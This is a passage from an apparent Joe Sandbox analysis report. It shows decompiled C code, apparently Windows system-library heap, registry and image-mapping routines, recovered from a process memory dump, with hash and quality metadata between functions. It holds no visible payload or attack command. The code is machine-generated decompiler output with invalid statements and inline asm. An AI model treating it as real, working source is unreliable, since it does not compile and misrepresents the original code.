                            									__eflags = _t224 - _t163;
                            									if(_t224 >= _t163) {
                            										break;
                            									}
                            									_t228 =  *0x38b7b9c; // 0x0
                            									_t214 = L037E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                            									 *(_t237 - 0x78) = _t214;
                            									__eflags = _t214;
                            									if(_t214 == 0) {
                            										L52:
                            										_t193 = 0xc0000017;
                            										L19:
                            										 *(_t237 - 0x44) = _t193;
                            										L20:
                            										_t206 =  *(_t237 - 0x40);
                            										__eflags = _t206;
                            										if(_t206 == 0) {
                            											L26:
                            											__eflags = _t193;
                            											if(_t193 < 0) {
                            												E038037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                            												__eflags =  *((char*)(_t237 - 0x39));
                            												if( *((char*)(_t237 - 0x39)) != 0) {
                            													 *0x38b7b10 =  *0x38b7b10 - 8;
                            												}
                            											} else {
                            												_t169 =  *(_t237 - 0x68);
                            												__eflags = _t169;
                            												if(_t169 != 0) {
                            													 *0x38b7b04 =  *0x38b7b04 - _t169;
                            												}
                            											}
                            											__eflags = _t193;
                            											if(_t193 >= 0) {
                            												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                            											}
                            											goto L30;
                            										}
                            										_t226 = _t206 * 0xc;
                            										__eflags = _t226;
                            										_t194 =  *(_t237 - 0x48);
                            										do {
                            											 *(_t237 - 0x40) = _t206 - 1;
                            											_t226 = _t226 - 0xc;
                            											 *(_t237 - 0x4c) = _t226;
                            											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                            											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                            												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                            												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                            													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                            													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                            													__eflags =  *((char*)(_t237 - 0x39));
                            													if( *((char*)(_t237 - 0x39)) == 0) {
                            														_t171 = _t210;
                            													} else {
                            														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                            														L037E77F0(_t194, _t236, _t210 - 8);
                            														_t171 =  *(_t237 - 0x50);
                            													}
                            													L48:
                            													L037E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                            													L46:
                            													_t206 =  *(_t237 - 0x40);
                            													_t226 =  *(_t237 - 0x4c);
                            													goto L24;
                            												}
                            												 *0x38b7b08 =  *0x38b7b08 + 1;
                            												goto L24;
                            											}
                            											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                            											__eflags = _t171;
                            											if(_t171 != 0) {
                            												__eflags =  *((char*)(_t237 - 0x39));
                            												if( *((char*)(_t237 - 0x39)) == 0) {
                            													goto L48;
                            												}
                            												E038057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                            												goto L46;
                            											}
                            											L24:
                            											__eflags = _t206;
                            										} while (_t206 != 0);
                            										_t193 =  *(_t237 - 0x44);
                            										goto L26;
                            									}
                            									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                            									 *(_t237 - 0x7c) = _t232;
                            									 *(_t232 - 4) = _t214;
                            									 *(_t237 - 4) = _t236;
                            									E0380F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                            									_t238 = _t238 + 0xc;
                            									 *(_t237 - 4) = 0xfffffffe;
                            									_t215 =  *(_t237 - 0x48);
                            									__eflags = _t193;
                            									if(_t193 < 0) {
                            										L037E77F0(_t215, _t236,  *(_t237 - 0x78));
                            										goto L20;
                            									}
                            									__eflags =  *((char*)(_t237 - 0x39));
                            									if( *((char*)(_t237 - 0x39)) != 0) {
                            										_t233 = E037FA44B( *(_t237 - 0x4c));
                            										 *(_t237 - 0x50) = _t233;
                            										__eflags = _t233;
                            										if(_t233 == 0) {
                            											L037E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                            											goto L52;
                            										}
                            										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                            										L17:
                            										_t234 =  *(_t237 - 0x40);
                            										_t218 = _t234 * 0xc;
                            										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                            										 *(_t218 + _t235 + 0x10) = _t236;
                            										_t224 = _t234 + 1;
                            										 *(_t237 - 0x40) = _t224;
                            										 *(_t237 - 0x50) = _t224;
                            										_t193 =  *(_t237 - 0x44);
                            										continue;
                            									}
                            									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                            									goto L17;
                            								}
                            								 *_t235 = _t236;
                            								_t165 = 0x10 + _t163 * 0xc;
                            								__eflags = _t165;
                            								_push(_t165);
                            								_push(_t235);
                            								_push(0x23);
                            								_push(0xffffffff);
                            								_t193 = E038096C0();
                            								goto L19;
                            							} else {
                            								goto L50;
                            							}
                            						}
                            						_t235 = _t237 - 0x38;
                            						 *(_t237 - 0x60) = _t235;
                            						goto L8;
                            					}
                            					goto L4;
                            				}
                            			}


































                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c17897d72892ab2c4f5bd2605cd9fc7a9bd6d4b2abb2dcdfed31bc53c795ce53
                            • Instruction ID: 8feeb1aa1b3a7ac1a656abcd56ab054a279674d53cfa03a6351dd9f964e07221
                            • Opcode Fuzzy Hash: c17897d72892ab2c4f5bd2605cd9fc7a9bd6d4b2abb2dcdfed31bc53c795ce53
                            • Instruction Fuzzy Hash: 9EB169B4E00359EFCB18DFE9C984AADBBB9BF48314F14416AE405AB346D770A941CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E037F513A(intOrPtr __ecx, void* __edx) {
                            				signed int _v8;
                            				signed char _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				char _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				signed int _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				char _v63;
                            				char _v64;
                            				signed int _v72;
                            				signed int _v76;
                            				signed int _v80;
                            				signed int _v84;
                            				signed int _v88;
                            				signed char* _v92;
                            				signed int _v100;
                            				signed int _v104;
                            				char _v105;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t157;
                            				signed int _t159;
                            				signed int _t160;
                            				unsigned int* _t161;
                            				intOrPtr _t165;
                            				signed int _t172;
                            				signed char* _t181;
                            				intOrPtr _t189;
                            				intOrPtr* _t200;
                            				signed int _t202;
                            				signed int _t203;
                            				char _t204;
                            				signed int _t207;
                            				signed int _t208;
                            				void* _t209;
                            				intOrPtr _t210;
                            				signed int _t212;
                            				signed int _t214;
                            				signed int _t221;
                            				signed int _t222;
                            				signed int _t226;
                            				intOrPtr* _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				intOrPtr _t237;
                            				intOrPtr _t238;
                            				intOrPtr _t240;
                            				void* _t245;
                            				signed int _t246;
                            				signed int _t247;
                            				void* _t248;
                            				void* _t251;
                            				void* _t252;
                            				signed int _t253;
                            				signed int _t255;
                            				signed int _t256;
                            
                            				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                            				_v8 =  *0x38bd360 ^ _t255;
                            				_v32 = _v32 & 0x00000000;
                            				_t251 = __edx;
                            				_t237 = __ecx;
                            				_t212 = 6;
                            				_t245 =  &_v84;
                            				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                            				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                            				_v48 = __ecx;
                            				_v36 = _t207;
                            				_t157 = memset(_t245, 0, _t212 << 2);
                            				_t256 = _t255 + 0xc;
                            				_t246 = _t245 + _t212;
                            				if(_t207 == 2) {
                            					_t247 =  *(_t237 + 0x60);
                            					_t208 =  *(_t237 + 0x64);
                            					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                            					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                            					_v104 = _t159;
                            					_v76 = _t159;
                            					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                            					_v100 = _t160;
                            					_v72 = _t160;
                            					L19:
                            					_v80 = _t208;
                            					_v84 = _t247;
                            					L8:
                            					_t214 = 0;
                            					if( *(_t237 + 0x74) > 0) {
                            						_t82 = _t237 + 0x84; // 0x124
                            						_t161 = _t82;
                            						_v92 = _t161;
                            						while( *_t161 >> 0x1f != 0) {
                            							_t200 = _v92;
                            							if( *_t200 == 0x80000000) {
                            								break;
                            							}
                            							_t214 = _t214 + 1;
                            							_t161 = _t200 + 0x10;
                            							_v92 = _t161;
                            							if(_t214 <  *(_t237 + 0x74)) {
                            								continue;
                            							}
                            							goto L9;
                            						}
                            						_v88 = _t214 << 4;
                            						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                            						_t165 = 0;
                            						asm("adc eax, [ecx+edx+0x7c]");
                            						_v24 = _t165;
                            						_v28 = _v40;
                            						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                            						_t221 = _v40;
                            						_v16 =  *_v92;
                            						_v32 =  &_v28;
                            						if( *(_t237 + 0x4e) >> 0xf == 0) {
                            							goto L9;
                            						}
                            						_t240 = _v48;
                            						if( *_v92 != 0x80000000) {
                            							goto L9;
                            						}
                            						 *((intOrPtr*)(_t221 + 8)) = 0;
                            						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                            						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                            						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                            						_t226 = 0;
                            						_t181 = _t251 + 0x66;
                            						_v88 = 0;
                            						_v92 = _t181;
                            						do {
                            							if( *((char*)(_t181 - 2)) == 0) {
                            								goto L31;
                            							}
                            							_t226 = _v88;
                            							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                            								_t181 = E0380D0F0(1, _t226 + 0x20, 0);
                            								_t226 = _v40;
                            								 *(_t226 + 8) = _t181;
                            								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                            								L34:
                            								if(_v44 == 0) {
                            									goto L9;
                            								}
                            								_t210 = _v44;
                            								_t127 = _t210 + 0x1c; // 0x1c
                            								_t249 = _t127;
                            								E037E2280(_t181, _t127);
                            								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                            								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                            								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                            									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                            								}
                            								_t189 = L037E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                            								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                            								if(_t189 != 0) {
                            									 *((intOrPtr*)(_t189 + 8)) = _v20;
                            									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                            									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                            									 *_t232 = _t232 + 0x10;
                            									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                            									E0380F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                            									_t256 = _t256 + 0xc;
                            								}
                            								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                            								E037DFFB0(_t210, _t249, _t249);
                            								_t222 = _v76;
                            								_t172 = _v80;
                            								_t208 = _v84;
                            								_t247 = _v88;
                            								L10:
                            								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                            								_v44 = _t238;
                            								if(_t238 != 0) {
                            									 *0x38bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                            									_v44();
                            								}
                            								_pop(_t248);
                            								_pop(_t252);
                            								_pop(_t209);
                            								return E0380B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                            							}
                            							_t181 = _v92;
                            							L31:
                            							_t226 = _t226 + 1;
                            							_t181 =  &(_t181[0x18]);
                            							_v88 = _t226;
                            							_v92 = _t181;
                            						} while (_t226 < 4);
                            						goto L34;
                            					}
                            					L9:
                            					_t172 = _v104;
                            					_t222 = _v100;
                            					goto L10;
                            				}
                            				_t247 = _t246 | 0xffffffff;
                            				_t208 = _t247;
                            				_v84 = _t247;
                            				_v80 = _t208;
                            				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                            					_t233 = _v72;
                            					_v105 = _v64;
                            					_t202 = _v76;
                            				} else {
                            					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                            					_v105 = 1;
                            					if(_v63 <= _t204) {
                            						_v63 = _t204;
                            					}
                            					_t202 = _v76 |  *(_t251 + 0x40);
                            					_t233 = _v72 |  *(_t251 + 0x44);
                            					_t247 =  *(_t251 + 0x38);
                            					_t208 =  *(_t251 + 0x3c);
                            					_v76 = _t202;
                            					_v72 = _t233;
                            					_v84 = _t247;
                            					_v80 = _t208;
                            				}
                            				_v104 = _t202;
                            				_v100 = _t233;
                            				if( *((char*)(_t251 + 0xc4)) != 0) {
                            					_t237 = _v48;
                            					_v105 = 1;
                            					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                            						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                            						_t237 = _v48;
                            					}
                            					_t203 = _t202 |  *(_t251 + 0xb8);
                            					_t234 = _t233 |  *(_t251 + 0xbc);
                            					_t247 = _t247 &  *(_t251 + 0xb0);
                            					_t208 = _t208 &  *(_t251 + 0xb4);
                            					_v104 = _t203;
                            					_v76 = _t203;
                            					_v100 = _t234;
                            					_v72 = _t234;
                            					_v84 = _t247;
                            					_v80 = _t208;
                            				}
                            				if(_v105 == 0) {
                            					_v36 = _v36 & 0x00000000;
                            					_t208 = 0;
                            					_t247 = 0;
                            					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                            					goto L19;
                            				} else {
                            					_v36 = 1;
                            					goto L8;
                            				}
                            			}































































                            0x037f5195
                            0x03836db1
                            0x03836db5
                            0x03836db9
                            0x037f519b
                            0x037f519b
                            0x037f519e
                            0x037f51a7
                            0x037f51a9
                            0x037f51a9
                            0x037f51b5
                            0x037f51b8
                            0x037f51bb
                            0x037f51be
                            0x037f51c1
                            0x037f51c5
                            0x037f51c9
                            0x037f51cd
                            0x037f51cd
                            0x037f51d8
                            0x037f51dc
                            0x037f51e0
                            0x03836dcc
                            0x03836dd0
                            0x03836dd5
                            0x03836ddd
                            0x03836de1
                            0x03836de1
                            0x03836de5
                            0x03836deb
                            0x03836df1
                            0x03836df7
                            0x03836dfd
                            0x03836e01
                            0x03836e05
                            0x03836e09
                            0x03836e0d
                            0x03836e11
                            0x03836e11
                            0x037f51eb
                            0x03836e1a
                            0x03836e1f
                            0x03836e21
                            0x03836e23
                            0x00000000
                            0x037f51f1
                            0x037f51f1
                            0x00000000
                            0x037f51f1

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4fd247fc65c28babe92f7281aa543798e5d4f9c888fa06f8822a005f4bf9d0cf
                            • Instruction ID: 88a2b96bbbb5ae4fd44d00a117ad9b06ef63a31d5f43d2ec6ff00ebf070b7a87
                            • Opcode Fuzzy Hash: 4fd247fc65c28babe92f7281aa543798e5d4f9c888fa06f8822a005f4bf9d0cf
                            • Instruction Fuzzy Hash: 88C143755093809FD354CF68C480A6AFBF1BF89314F184AAEF9998B352D771E845CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E037F03E2(signed int __ecx, signed int __edx) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				signed int _v48;
                            				char _v52;
                            				char _v56;
                            				char _v64;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t56;
                            				signed int _t58;
                            				char* _t64;
                            				intOrPtr _t65;
                            				signed int _t74;
                            				signed int _t79;
                            				char* _t83;
                            				intOrPtr _t84;
                            				signed int _t93;
                            				signed int _t94;
                            				signed char* _t95;
                            				signed int _t99;
                            				signed int _t100;
                            				signed char* _t101;
                            				signed int _t105;
                            				signed int _t119;
                            				signed int _t120;
                            				void* _t122;
                            				signed int _t123;
                            				signed int _t127;
                            
                            				_v8 =  *0x38bd360 ^ _t127;
                            				_t119 = __ecx;
                            				_t105 = __edx;
                            				_t118 = 0;
                            				_v20 = __edx;
                            				_t120 =  *(__ecx + 0x20);
                            				if(E037F0548(__ecx, 0) != 0) {
                            					_t56 = 0xc000022d;
                            					L23:
                            					return E0380B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                            				} else {
                            					_v12 = _v12 | 0xffffffff;
                            					_t58 = _t120 + 0x24;
                            					_t109 =  *(_t120 + 0x18);
                            					_t118 = _t58;
                            					_v16 = _t58;
                            					E037DB02A( *(_t120 + 0x18), _t118, 0x14a5);
                            					_v52 = 0x18;
                            					_v48 = 0;
                            					0x840 = 0x40;
                            					if( *0x38b7c1c != 0) {
                            					}
                            					_v40 = 0x840;
                            					_v44 = _t105;
                            					_v36 = 0;
                            					_v32 = 0;
                            					if(E037E7D50() != 0) {
                            						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					} else {
                            						_t64 = 0x7ffe0384;
                            					}
                            					if( *_t64 != 0) {
                            						_t65 =  *[fs:0x30];
                            						__eflags =  *(_t65 + 0x240) & 0x00000004;
                            						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                            							_t100 = E037E7D50();
                            							__eflags = _t100;
                            							if(_t100 == 0) {
                            								_t101 = 0x7ffe0385;
                            							} else {
                            								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            							}
                            							__eflags =  *_t101 & 0x00000020;
                            							if(( *_t101 & 0x00000020) != 0) {
                            								_t118 = _t118 | 0xffffffff;
                            								_t109 = 0x1485;
                            								E03847016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                            							}
                            						}
                            					}
                            					_t105 = 0;
                            					while(1) {
                            						_push(0x60);
                            						_push(5);
                            						_push( &_v64);
                            						_push( &_v52);
                            						_push(0x100021);
                            						_push( &_v12);
                            						_t122 = E03809830();
                            						if(_t122 >= 0) {
                            							break;
                            						}
                            						__eflags = _t122 - 0xc0000034;
                            						if(_t122 == 0xc0000034) {
                            							L38:
                            							_t120 = 0xc0000135;
                            							break;
                            						}
                            						__eflags = _t122 - 0xc000003a;
                            						if(_t122 == 0xc000003a) {
                            							goto L38;
                            						}
                            						__eflags = _t122 - 0xc0000022;
                            						if(_t122 != 0xc0000022) {
                            							break;
                            						}
                            						__eflags = _t105;
                            						if(__eflags != 0) {
                            							break;
                            						}
                            						_t109 = _t119;
                            						_t99 = E038469A6(_t119, __eflags);
                            						__eflags = _t99;
                            						if(_t99 == 0) {
                            							break;
                            						}
                            						_t105 = _t105 + 1;
                            					}
                            					if( !_t120 >= 0) {
                            						L22:
                            						_t56 = _t120;
                            						goto L23;
                            					}
                            					if( *0x38b7c04 != 0) {
                            						_t118 = _v12;
                            						_t120 = E0384A7AC(_t119, _t118, _t109);
                            						__eflags = _t120;
                            						if(_t120 >= 0) {
                            							goto L10;
                            						}
                            						__eflags =  *0x38b7bd8;
                            						if( *0x38b7bd8 != 0) {
                            							L20:
                            							if(_v12 != 0xffffffff) {
                            								_push(_v12);
                            								E038095D0();
                            							}
                            							goto L22;
                            						}
                            					}
                            					L10:
                            					_push(_v12);
                            					_t105 = _t119 + 0xc;
                            					_push(0x1000000);
                            					_push(0x10);
                            					_push(0);
                            					_push(0);
                            					_push(0xf);
                            					_push(_t105);
                            					_t120 = E038099A0();
                            					if(_t120 < 0) {
                            						__eflags = _t120 - 0xc000047e;
                            						if(_t120 == 0xc000047e) {
                            							L51:
                            							_t74 = E03843540(_t120);
                            							_t119 = _v16;
                            							_t120 = _t74;
                            							L52:
                            							_t118 = 0x1485;
                            							E037CB1E1(_t120, 0x1485, 0, _t119);
                            							goto L20;
                            						}
                            						__eflags = _t120 - 0xc000047f;
                            						if(_t120 == 0xc000047f) {
                            							goto L51;
                            						}
                            						__eflags = _t120 - 0xc0000462;
                            						if(_t120 == 0xc0000462) {
                            							goto L51;
                            						}
                            						_t119 = _v16;
                            						__eflags = _t120 - 0xc0000017;
                            						if(_t120 != 0xc0000017) {
                            							__eflags = _t120 - 0xc000009a;
                            							if(_t120 != 0xc000009a) {
                            								__eflags = _t120 - 0xc000012d;
                            								if(_t120 != 0xc000012d) {
                            									_v28 = _t119;
                            									_push( &_v56);
                            									_push(1);
                            									_v24 = _t120;
                            									_push( &_v28);
                            									_push(1);
                            									_push(2);
                            									_push(0xc000007b);
                            									_t79 = E0380AAF0();
                            									__eflags = _t79;
                            									if(_t79 >= 0) {
                            										__eflags =  *0x38b8474 - 3;
                            										if( *0x38b8474 != 3) {
                            											 *0x38b79dc =  *0x38b79dc + 1;
                            										}
                            									}
                            								}
                            							}
                            						}
                            						goto L52;
                            					}
                            					if(E037E7D50() != 0) {
                            						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					} else {
                            						_t83 = 0x7ffe0384;
                            					}
                            					if( *_t83 != 0) {
                            						_t84 =  *[fs:0x30];
                            						__eflags =  *(_t84 + 0x240) & 0x00000004;
                            						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                            							_t94 = E037E7D50();
                            							__eflags = _t94;
                            							if(_t94 == 0) {
                            								_t95 = 0x7ffe0385;
                            							} else {
                            								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            							}
                            							__eflags =  *_t95 & 0x00000020;
                            							if(( *_t95 & 0x00000020) != 0) {
                            								E03847016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                            							}
                            						}
                            					}
                            					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                            						if( *0x38b8708 != 0) {
                            							_t118 =  *0x7ffe0330;
                            							_t123 =  *0x38b7b00; // 0x0
                            							asm("ror esi, cl");
                            							 *0x38bb1e0(_v12, _v20, 0x20);
                            							_t93 =  *(_t123 ^  *0x7ffe0330)();
                            							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                            							asm("sbb esi, esi");
                            							_t120 =  ~_t50 & _t93;
                            						} else {
                            							_t120 = 0;
                            						}
                            					}
                            					if( !_t120 >= 0) {
                            						L19:
                            						_push( *_t105);
                            						E038095D0();
                            						 *_t105 =  *_t105 & 0x00000000;
                            						goto L20;
                            					}
                            					_t120 = E037D7F65(_t119);
                            					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                            						__eflags = _t120;
                            						if(_t120 < 0) {
                            							goto L19;
                            						}
                            						 *(_t119 + 0x64) = _v12;
                            						goto L22;
                            					}
                            					goto L19;
                            				}
                            			}









































                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 524cc8c18848486665d8f37091b51981b64b953edc5c3d23b6c80a4b0de781b7
                            • Instruction ID: 149d6a89bfaf1c752810cbd8ee02bdf74afe858b1b28fd5c5409f830ae22fa5c
                            • Opcode Fuzzy Hash: 524cc8c18848486665d8f37091b51981b64b953edc5c3d23b6c80a4b0de781b7
                            • Instruction Fuzzy Hash: 2A91F575E007599FDB21DAA9C844BBDBBA4BB06724F0902E5EA11EB3D1D7749D00C7C1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E037CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                            				signed int _v8;
                            				char _v1036;
                            				signed int _v1040;
                            				char _v1048;
                            				signed int _v1052;
                            				signed char _v1056;
                            				void* _v1058;
                            				char _v1060;
                            				signed int _v1064;
                            				void* _v1068;
                            				intOrPtr _v1072;
                            				void* _v1084;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr _t70;
                            				intOrPtr _t72;
                            				signed int _t74;
                            				intOrPtr _t77;
                            				signed int _t78;
                            				signed int _t81;
                            				void* _t101;
                            				signed int _t102;
                            				signed int _t107;
                            				signed int _t109;
                            				signed int _t110;
                            				signed char _t111;
                            				signed int _t112;
                            				signed int _t113;
                            				signed int _t114;
                            				intOrPtr _t116;
                            				void* _t117;
                            				char _t118;
                            				void* _t120;
                            				char _t121;
                            				signed int _t122;
                            				signed int _t123;
                            				signed int _t125;
                            
                            				_t125 = (_t123 & 0xfffffff8) - 0x424;
                            				_v8 =  *0x38bd360 ^ _t125;
                            				_t116 = _a4;
                            				_v1056 = _a16;
                            				_v1040 = _a24;
                            				if(E037D6D30( &_v1048, _a8) < 0) {
                            					L4:
                            					_pop(_t117);
                            					_pop(_t120);
                            					_pop(_t101);
                            					return E0380B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                            				}
                            				_t70 = _a20;
                            				if(_t70 >= 0x3f4) {
                            					_t121 = _t70 + 0xc;
                            					L19:
                            					_t107 =  *( *[fs:0x30] + 0x18);
                            					__eflags = _t107;
                            					if(_t107 == 0) {
                            						L60:
                            						_t68 = 0xc0000017;
                            						goto L4;
                            					}
                            					_t72 =  *0x38b7b9c; // 0x0
                            					_t74 = L037E4620(_t107, _t107, _t72 + 0x180000, _t121);
                            					_v1064 = _t74;
                            					__eflags = _t74;
                            					if(_t74 == 0) {
                            						goto L60;
                            					}
                            					_t102 = _t74;
                            					_push( &_v1060);
                            					_push(_t121);
                            					_push(_t74);
                            					_push(2);
                            					_push( &_v1048);
                            					_push(_t116);
                            					_t122 = E03809650();
                            					__eflags = _t122;
                            					if(_t122 >= 0) {
                            						L7:
                            						_t114 = _a12;
                            						__eflags = _t114;
                            						if(_t114 != 0) {
                            							_t77 = _a20;
                            							L26:
                            							_t109 =  *(_t102 + 4);
                            							__eflags = _t109 - 3;
                            							if(_t109 == 3) {
                            								L55:
                            								__eflags = _t114 - _t109;
                            								if(_t114 != _t109) {
                            									L59:
                            									_t122 = 0xc0000024;
                            									L15:
                            									_t78 = _v1052;
                            									__eflags = _t78;
                            									if(_t78 != 0) {
                            										L037E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                            									}
                            									_t68 = _t122;
                            									goto L4;
                            								}
                            								_t110 = _v1056;
                            								_t118 =  *((intOrPtr*)(_t102 + 8));
                            								_v1060 = _t118;
                            								__eflags = _t110;
                            								if(_t110 == 0) {
                            									L10:
                            									_t122 = 0x80000005;
                            									L11:
                            									_t81 = _v1040;
                            									__eflags = _t81;
                            									if(_t81 == 0) {
                            										goto L15;
                            									}
                            									__eflags = _t122;
                            									if(_t122 >= 0) {
                            										L14:
                            										 *_t81 = _t118;
                            										goto L15;
                            									}
                            									__eflags = _t122 - 0x80000005;
                            									if(_t122 != 0x80000005) {
                            										goto L15;
                            									}
                            									goto L14;
                            								}
                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                            								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                            									goto L10;
                            								}
                            								_push( *((intOrPtr*)(_t102 + 8)));
                            								_t59 = _t102 + 0xc; // 0xc
                            								_push(_t110);
                            								L54:
                            								E0380F3E0();
                            								_t125 = _t125 + 0xc;
                            								goto L11;
                            							}
                            							__eflags = _t109 - 7;
                            							if(_t109 == 7) {
                            								goto L55;
                            							}
                            							_t118 = 4;
                            							__eflags = _t109 - _t118;
                            							if(_t109 != _t118) {
                            								__eflags = _t109 - 0xb;
                            								if(_t109 != 0xb) {
                            									__eflags = _t109 - 1;
                            									if(_t109 == 1) {
                            										__eflags = _t114 - _t118;
                            										if(_t114 != _t118) {
                            											_t118 =  *((intOrPtr*)(_t102 + 8));
                            											_v1060 = _t118;
                            											__eflags = _t118 - _t77;
                            											if(_t118 > _t77) {
                            												goto L10;
                            											}
                            											_push(_t118);
                            											_t56 = _t102 + 0xc; // 0xc
                            											_push(_v1056);
                            											goto L54;
                            										}
                            										__eflags = _t77 - _t118;
                            										if(_t77 != _t118) {
                            											L34:
                            											_t122 = 0xc0000004;
                            											goto L15;
